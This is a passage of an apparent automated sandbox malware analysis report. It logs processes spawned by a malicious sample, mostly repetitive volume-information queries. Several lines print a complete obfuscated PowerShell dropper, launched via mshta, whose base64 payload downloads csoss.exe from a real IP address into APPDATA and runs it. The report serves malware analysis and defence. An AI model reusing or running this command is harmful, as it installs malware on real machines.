Nzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csoss.exe "C:\Users\user\AppData\Roaming\csoss.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEFD.tmp" "c:\Users\user\AppData\Local\Temp\dkgvurtz\CSCEFC899AF36F541BC9861FF65BE4F3BB.TMP"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csoss.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jed2qvygicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtvflwrsagicagicagicagicagicagicagicagicagicagicagicattwvtymvyrevgau5jdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagssxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagyxlsvvr0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbxdu5kcfnxlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagqkkssw50uhryicagicagicagicagicagicagicagicagicagicagicagig9oc28poycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginjpbfn5iiagicagicagicagicagicagicagicagicagicagicagicatbkfnrvnwywnlicagicagicagicagicagicagicagicagicagicagicagigrls3lvtmqgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakr3zbvjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yoc8xmtavy3nvc3muzxhliiwijgvovjpbufbeqvrbxgnzb3nzlmv4zsismcwwktttdefyvc1ztevlucgzkttptlzvs0utsvrftsagicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxgnzb3nzlmv4zsi='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jed2qvygicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtvflwrsagicagicagicagicagicagicagicagicagicagicagicattwvtymvyrevgau5jdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagssxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagyxlsvvr0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbxdu5kcfnxlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagqkkssw50uhryicagicagicagicagicagicagicagicagicagicagicagig9oc28poycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginjpbfn5iiagicagicagicagicagicagicagicagicagicagicagicatbkfnrvnwywnlicagicagicagicagicagicagicagicagicagicagicagigrls3lvtmqgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakr3zbvjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yoc8xmtavy3nvc3muzxhliiwijgvovjpbufbeqvrbxgnzb3nzlmv4zsismcwwktttdefyvc1ztevlucgzkttptlzvs0utsvrftsagicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxgnzb3nzlmv4zsi='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jed2qvygicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtvflwrsagicagicagicagicagicagicagicagicagicagicagicattwvtymvyrevgau5jdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagssxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagyxlsvvr0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbxdu5kcfnxlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagqkkssw50uhryicagicagicagicagicagicagicagicagicagicagicagig9oc28poycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginjpbfn5iiagicagicagicagicagicagicagicagicagicagicagicatbkfnrvnwywnlicagicagicagicagicagicagicagicagicagicagicagigrls3lvtmqgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakr3zbvjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yoc8xmtavy3nvc3muzxhliiwijgvovjpbufbeqvrbxgnzb3nzlmv4zsismcwwktttdefyvc1ztevlucgzkttptlzvs0utsvrftsagicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxgnzb3nzlmv4zsi='+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jed2qvygicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtvflwrsagicagicagicagicagicagicagicagicagicagicagicattwvtymvyrevgau5jdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagssxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagyxlsvvr0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbxdu5kcfnxlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagqkkssw50uhryicagicagicagicagicagicagicagicagicagicagicagig9oc28poycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginjpbfn5iiagicagicagicagicagicagicagicagicagicagicagicatbkfnrvnwywnlicagicagicagicagicagicagicagicagicagicagicagigrls3lvtmqgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakr3zbvjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yoc8xmtavy3nvc3muzxhliiwijgvovjpbufbeqvrbxgnzb3nzlmv4zsismcwwktttdefyvc1ztevlucgzkttptlzvs0utsvrftsagicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxgnzb3nzlmv4zsi='+[char]34+'))')))"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00207CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,6_2_00207CAF
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0020874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,6_2_0020874B
                    Source: csoss.exe, 00000006.00000002.1392686190.0000000000264000.00000002.00000001.01000000.0000000A.sdmp, csoss.exe.3.dr, csoss[1].exe.3.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: csoss.exeBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001D862B cpuid 6_2_001D862B
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
